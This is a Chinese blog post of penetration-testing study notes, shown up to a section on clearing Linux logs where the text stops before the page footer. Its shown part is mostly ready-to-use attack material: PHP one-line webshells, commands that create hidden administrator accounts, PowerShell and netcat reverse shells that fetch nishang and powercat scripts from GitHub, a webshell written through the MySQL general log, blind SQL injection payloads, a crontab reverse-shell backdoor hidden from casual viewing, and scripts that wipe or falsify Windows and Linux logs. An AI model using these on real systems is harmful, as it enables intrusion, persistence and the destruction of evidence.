学习笔记记录

目录

windows

php一句话木马

日志清理

DOS命令

查看用户的SID

最高权限

常见的cmd命令

反弹shell

PHPMYadmin

mysql注入语句

wmic

linux

crontab创建隐藏后门

linux日志文件

knockd服务

ssh登录

ssh隧道

本地转发

远程转发

动态转发

/proc:

Centos 8 更新 yum 源

痕迹清理技巧

隐身ssh登录系统

docker

设置仓库

Docker 更换国内镜像源

密码信息

内核提权

查看发行版

查看内核版本

一句话添加用户

获取临时shell

设置受限制shell

绕过受限的shell

可提权文件

辅助提权工具

git提权

清理磁盘

df

du

查看可执行的命令

系统信息

查看系统是32位还是64位

查看内核信息

查看开机启动

计划任务

特殊权限

环境变量

查看ssh日志信息

查找特殊权限账号(默认root)

查找可以登录ssh的账号

查看正在连接的ssh sessions

抓包

teehee提权

find

提权

按权限查找

按所有者查找

按时间查找

按大小查找文件

grep

mysql暴力破解

查看登录错误的用户名

查看登录错误用户名及ip登录次数

kali

crunch

john破解zip加密文件

nmap

常用

脚本扫描

hydra

ssh:22

Ftp:21

https

smb

rdp:3389

pop3

sqlmap

Access注入

MySQL数据库注入

Cookie注入

POST表单注入

绕过WAF防火墙

meterpreter

端口转发

设置监听

乱码

常用基本系统命令

文件命令

获取系统信息

用户界面

权限

hashdump

利用

内网渗透

维持访问(种植后门)

第三种shift后门

常用

msf

msfvenom

WMAP(轻量级测试工具,检测常见的Web漏洞)

NDProxy内核提权


免责声明

文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!!!

windows

php一句话木马
<?php eval(@$_POST['a']);?>
<?php eval(@$_GET['a']);?>
其中eval就是执行命令的函数,$_POST['a']就是接收的数据。eval函数把接收的数据当作PHP代码来执行。这样就能够让插入了一句话木马的网站执行传递过去的任意PHP命令。
​
<?php assert(@$_POST['a']); ?>
​
<?php
$fun = create_function('',$_POST['a']);
$fun();
?>
​
<?php
@call_user_func(assert,$_POST['a']);
?>

日志清理
wevtutil:
​
wevtutil el 列出系统中所有日志名称
wevtutil cl system 清理系统日志
wevtutil cl application 清理应用程序日志
wevtutil cl security 清理安全日志
​
或直接打开C:\Users\Administrator\Recent并删除所有内容
​
或在命令行中输入del /f /s /q “%userprofile%\Recent*.*

DOS命令
    1. gpedit.msc-----组策略
​
  2. sndrec32-------录音机
​
  3. Nslookup-------IP地址侦测器 ,是一个 监测网络中 DNS 服务器是否能正确实现域名解析的命令行工具。 它在 Windows NT/2000/XP 中均可使用 , 但在 Windows 98 中却没有集成这一个工具。
​
  4. explorer-------打开资源管理器
​
  5. logoff---------注销命令
​
  6. shutdown-------60秒倒计时关机命令
​
  7. lusrmgr.msc----本机用户和组
​
  8. services.msc---本地服务设置
​
  9. oobe/msoobe /a----检查XP是否激活
​
  10. notepad--------打开记事本
​
  11. cleanmgr-------垃圾整理
​
  12. net start messenger----开始信使服务
​
  13. compmgmt.msc---计算机管理
​
  14. net stop messenger-----停止信使服务
​
  15. conf-----------启动netmeeting
​
  16. dvdplay--------DVD播放器
​
  17. charmap--------启动字符映射表
​
  18. diskmgmt.msc---磁盘管理实用程序
​
  19. calc-----------启动计算器
​
  20. dfrg.msc-------磁盘碎片整理程序
​
  21. chkdsk.exe-----Chkdsk磁盘检查
​
  22. devmgmt.msc--- 设备管理器
​
  23. regsvr32 /u *.dll----停止dll文件运行
​
  24. drwtsn32------ 系统医生
​
  25. rononce -p----15秒关机
​
  26. dxdiag---------检查DirectX信息
​
  27. regedt32-------注册表编辑器
​
  28. Msconfig.exe---系统配置实用程序
​
  29. rsop.msc-------组策略结果集
​
  30. mem.exe--------显示内存使用情况
​
  31. regedit.exe----注册表
​
  32. winchat--------XP自带局域网聊天
​
  33. progman--------程序管理器
​
  34. winmsd---------系统信息
​
  35. perfmon.msc----计算机性能监测程序
​
  36. winver---------检查Windows版本
​
  37. sfc /scannow-----扫描错误并复原
​
  38. taskmgr-----任务管理器(2000/xp/2003
​
  40. wmimgmt.msc----打开windows管理体系结构(WMI)
​
  41. wupdmgr--------windows更新程序
​
  42. wscript--------windows脚本宿主设置
​
  43. write----------写字板
​
  45. wiaacmgr-------扫描仪和照相机向导
​
  46. winchat--------XP自带局域网聊天
​
  49. mplayer2-------简易widnows media player
​
  50. mspaint--------画图板
​
  51. mstsc----------远程桌面连接
​
  53. magnify--------放大镜实用程序
​
  54. mmc------------打开控制台
​
  55. mobsync--------同步命令
​
  57. iexpress-------木马捆绑工具,系统自带
​
  58. fsmgmt.msc-----共享文件夹管理器
​
  59. utilman--------辅助工具管理器
​
  61. dcomcnfg-------打开系统组件服务
​
  62. ddeshare-------打开DDE共享设置
​
  110. osk------------打开屏幕键盘
​
  111. odbcad32-------ODBC数据源管理器
​
  112. oobe/msoobe /a----检查XP是否激活
​
  68. ntbackup-------系统备份和还原
​
  69. narrator-------屏幕“讲述人”
​
  70. ntmsmgr.msc----移动存储管理器
​
  71. ntmsoprq.msc---移动存储管理员操作请求
​
  72. netstat -an----(TC)命令检查接口
​
  73. syncapp--------创建一个公文包
​
  74. sysedit--------系统配置编辑器
​
  75. sigverif-------文件签名验证程序
​
  76. ciadv.msc------索引服务程序
​
  77. shrpubw--------创建共享文件夹
​
  78. secpol.msc-----本地安全策略
​
  79. syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码
​
  80. services.msc---本地服务设置
​
  81. Sndvol32-------音量控制程序
​
  82. sfc.exe--------系统文件检查器
​
  83. sfc /scannow---windows文件保护
​
  84. ciadv.msc------索引服务程序
​
  85. tourstart------xp简介(安装完成后出现的漫游xp程序)
​
  86. taskmgr--------任务管理器
​
  87. eventvwr-------事件查看器
​
  88. eudcedit-------造字程序
​
  89. compmgmt.msc---计算机管理
​
  90. packager-------对象包装程序
​
  91. perfmon.msc----计算机性能监测程序
​
  92. charmap--------启动字符映射表
​
  93. cliconfg-------SQL SERVER 客户端网络实用程序
​
  94. Clipbrd--------剪贴板查看器
​
  95. conf-----------启动netmeeting
​
  96. certmgr.msc----证书管理实用程序
​
  97. regsvr32 /u *.dll----停止dll文件运行
​
  98. regsvr32 /u zipfldr.dll------取消ZIP支持
​
  99. cmd.exe--------CMD命令提示符

查看用户的SID
whoami /user  //查看当前用户的sid
wmic useraccount get name,sid  //查看系统所有用户的sid

最高权限
Administrator作为默认用户名是默认的最高用户权限。
可以调用系统大部分资源。
属于一个权职控制台权限。
​
trustedinstaller和system的权限比administrator要高。
trustedinstaller最主要的功能是做系统层级的加密、证书处理等工作的,是一个底层权限。

常见的cmd命令
#系统信息 
​
net  user   hack$  123  /add        创建隐藏用户hack,密码为123
net  localgroup   administrators  hack$  /add   将隐藏用户hack提权到管理员
​
CHCP 65001              修改字体编码为UTF-8  
systeminfo              查看系统信息  
hostname               查看主机名  
SET                 查看环境变量  
color                改变cmd颜色  
cls                 清除屏幕  
​
#网络  
ping -t -l 65500 ip        死亡之ping  
ipconfig  /release         释放ip  
ipconfig  /renew          重新获得ip  
ipconfig  /flushdns        刷新DNS缓存  
route print             打印路由信息  
arp -a                查看arp缓存  
net view               查看局域网内其他计算机名称  
netsh firewall show state      防火墙状态  
netsh firewall show config      防火墙规则  
​
#用户  
whoami                查看系统当前用户  
net user               查看有哪些用户  
net user xie             查看用户xie的信息  
net localgroup            查看组  
net localgroup administrators     查看组administrators的信息  
net user hack  123 /add      新建一个用户hack,密码为123  
net user hack$ 123 /add      新建一个隐藏hack用户,密码为123  
net user hack  /del         删除用户hack  
net localgroup administrators hack /add  将普通用户hack提权到管理员  
net user guest /active:yes     激活guest用户  
net user guest /active:no     关闭guest用户  
net password  密码          更改系统当前登录用户密码  
net user guest 密码          更改guest用户密码  
​
#端口进程服务  
tasklist               查看进程  
tasklist /svc            查看进程,显示进程使用者名称  
netstat -ano            查看系统开放端口  
netstat -ano|findstr 80       查看80端口对应的PID  
tasklist | findstr 80        查看80端口对应的进程  
taskkill /f /t /im xx.exe      杀死xx.exe进程  
taskkill /F -pid 520         杀死pid为520的进程  
net start              查看开启了哪些服务  
net start telnet           开启telnet服务  
net stop telnet           停止 telnet服务  
start  www.baidu.com        打开网址  
​
#共享  
net use                查看连接  
net share               查看本地开启的共享  
net share ipc$            开启ipc$共享  
net share ipc$ /del          删除ipc$共享  
net share c$ /del           删除C盘共享  
net use \\192.168.10.15\ipc$ /u:"" ""   与192.168.10.15建立ipc空连接  
net use \\192.168.10.15   /u:"" ""   与192.168.10.15建立ipc空连接,可以吧ipc$去掉  
net use \\192.168.10.15 /u:"administrator" "root"  以administrator身份与192.168.10.15建立ipc连接  
net use \\192.168.10.15 /del       删除ipc连接  
net use \\192.168.10.15\c$ /u:"administrator" "root"  建立C盘共享  
dir \\192.168.10.15\c$         查看192.168.10.15C盘文件  
dir \\192.168.10.15\c$\user       查看192.168.10.15C盘文件下的user目录  
dir \\192.168.10.15\c$\user\test.exe  查看192.168.10.15C盘文件下的user目录下的test.exe文件  
net use \\192.168.10.15\c$ /del    删除该C盘共享连接  
net use k: \\192.168.10.15\c$ /u:"administrator" "root"  将目标C盘映射到本地K盘  
net use k: /del                       删除该映射  
​
#文件操作  
echo hello,word > 1.txt       向1.txt中写入 hello,word  
echo hello,word >>1.txt       向1.txt中追加 hello,word  
del                  删除一个文件  
deltree              删除文件夹和它下面的所有子文件夹还有文件  
ren 1.txt 2.txt           将 1.txt 重命名为 2.txt  
type 1.txt              查看1.txt文件的内容  
md                  创建一个文件夹  
rd                  删除一个文件夹  
move 1.txt d:/           将1.txt文件移动到d盘下  
type 123.txt             打开123.txt文件  
dir c:\                查看C盘下的文件  
dir c:\ /A             查看C盘下的所有文件,包括隐藏文件  
dir c:\ /S              查看C盘下和其子文件夹下的文件  
dir c:\ /B              只显示C盘下的文件名  
shutdown -s -t 60 -c “你的电脑被黑了”     -s关机 -r重启 -a取消  

反弹shell
chcp 65001 //设置utf-8
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp  -Reverse -IPAddress  192.168.100.128  -Port 9999"
​
​
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.100.128 -p 8888 -e powershell
​
nc.exe 192.168.100.128 8888 -e powershell

查询域名称:net view /domain
查 询 域 内 计 算 机 : net view /doamin:xx
查 询 域 控 制 器 时 间 : net time /domain
查 询 域 管 理 用 户 : net group "domain admins" /domain
得 到 域 控 制 主 机 名 : net group "domain controllers" /domain
获取域控主机名:net group "domain controllers" /domain

PHPMYadmin

查看数据库版本

select @@version

查看版本得知 数据库大于5.0

查询导出的路径

show variables like '%secure%'

查看日志状态 secure_auth off表示没有开启 保存路径在 @#@*#@.log

show variables like '%general%'

开启日志记录 并更改文件路径

set global general_log='on';
SET global general_log_file='D:/phpStudy/WWW/shell.php';

show variables like '%general%'

执行sql语句后 就会把记录保存在shell.php 里

SELECT '<?php @assert($_REQUEST["123"]);?>';

mysql注入语句
爆破所有数据库:

select group_concat(schema_name) from information_schema.schemata

获取数据库所有表:

select  group_concat(table_name) from information_schema.tables where table_schema='mysql'

获取所有列名:

select group_concat(column_name) from information_schema.columns where table_name='users'

获取所有用户密码:

select group_concat(password) from security.users
select group_concat(username) from security.users
盲注
方法一:时间延迟型手工注入
1.爆库长

?id=1' and if(length(database())=8,sleep(5),1)--+ 
明显延迟,数据库长度为8.

2.爆库名

?id=1' and if(left(database(),1)='s' ,sleep(5),1) --+
?id=1' and if(left(database(),8)='security' ,sleep(5),1) --+

3.爆表名 

?id=1' and if( left((select table_name from information_schema.tables where table_schema=database() limit 3,1),1)='u' ,sleep(5),1) --+

?id=1' and if( left((select table_name from information_schema.tables where table_schema=database() limit 3,2),1)='us' ,sleep(5),1) --+

?id=1' and if( left((select table_name from information_schema.tables where table_schema=database() limit 3,5),1)='users' ,sleep(5),1) --+

4.爆列名

?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password' ,sleep(5),1)--+

5.爆用户和密码

?id=1' and if(left((select username from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+

?id=1' and if(left((select password from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+

方法二,布尔型手工注入

在布尔型注入中,正确会回显,错误没有回显

1.爆库名

id=1' and length(database())=8--+

?id=' and left((select database()),1)='s' --+

?id=' and left((select database()),2)='se' --+

2.爆表名

?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' --+

3.爆列名

?id=1'and left((select column_name from information_schema.columns  where table_name='users'limit 2,1 ),8)='password' --+

4.爆用户和密码

?id=1' and left((select username from users order by id limit 0,1),1)='d' --+

?id=1' and left((select password from users order by id limit 0,1),1)='d' --+

wmic
wmic qfe list #查看补丁详情
wmic process get caption, executablepath,commandline #查看进程并显示运行进程的命令语句
wmic process where name=“WMIC.exe" call terminate #终止某个进程
wmic os get name,servicepackmajorversion #提取操作系统的servicepack版本
wmic product get name,version #得到安装部分应用的版本
wmic product where name=“name” call uninstall /nointeractive #卸载名字为name的软件
wmic share get /ALL #查看共享情况
wmic nteventlog get path,filename, writeable #得到日志文件的位置
进程管理
​
wmic process list brief    #列出所有进程,Full显示所有、Brief显示摘要、Instance显示实例、Status显示状态
wmic process get name,executablepath                           #获取所有进程名称以及可执行路径
wmic process where name="jqs.exe" get executablepath            #获取指定进程可执行路径
wmic process call create "C:\Program Files\Tencent\QQ\QQ.exe"   #创建新进程
wmic process call create "shutdown.exe -r -f -t 60"             #根据命令创建进程
wmic process where name="qq.exe" delete                    #根据进程名称删除进程
wmic process where pid="123" delete                        #根据PID删除进程
账号管理
​
WMIC USERACCOUNT where "name='%UserName%'" call rename newUserName  #更改当前用户名
账号管理
​
WMIC USERACCOUNT where "name='%UserName%'" call rename newUserName  #更改当前用户名
共享管理
​
#建立共享
WMIC SHARE CALL Create "","test","3","TestShareName","","c:\test",0
(可使用 WMIC SHARE CALL Create /? 查看create后的参数类型)
​
#删除共享
WMIC SHARE where name="C$" call delete
WMIC SHARE where path='c:\test' delete
服务管理
​
#更改telnet服务启动类型[Auto|Disabled|Manual]
wmic SERVICE where name="tlntsvr" set startmode="Auto"
​
#运行telnet服务
wmic SERVICE where name="tlntsvr" call startservice
​
#停止ICS服务
wmic SERVICE where name="ShardAccess" call stopservice
​
#删除test服务
wmic SERVICE where name="test" call delete

linux

crontab创建隐藏后门

(crontab -l;printf "* * * * * nc 192.168.95.128 5555 -e /bin/bash;\rno crontab for `whoami`%100c\n")|crontab -

查看:

cat -A /var/spool/cron/root

linux日志文件

使用vim打开文件执行命令
:set history=0
:!command
针对性删除日志文件:
删除当天日志
sed -i '/当天日期/'d filename
篡改日志文件:
将所有170.170.64.17ip替换为127.0.0.1
sed -i 's/170.170.64.17/127.0.0.1/g'
一键清除脚本:

#!/usr/bin/bash
echo > /var/log/syslog
echo > /var/log/messages
echo > /var/log/httpd/access_log
echo > /var/log/httpd/error_log
echo > /var/log/xferlog
echo > /var/log/secure
echo > /var/log/auth.log
echo > /var/log/user.log
echo > /var/log/wtmp
echo > /var/log/lastlog
echo &
  • 19
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cheng-Ling

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值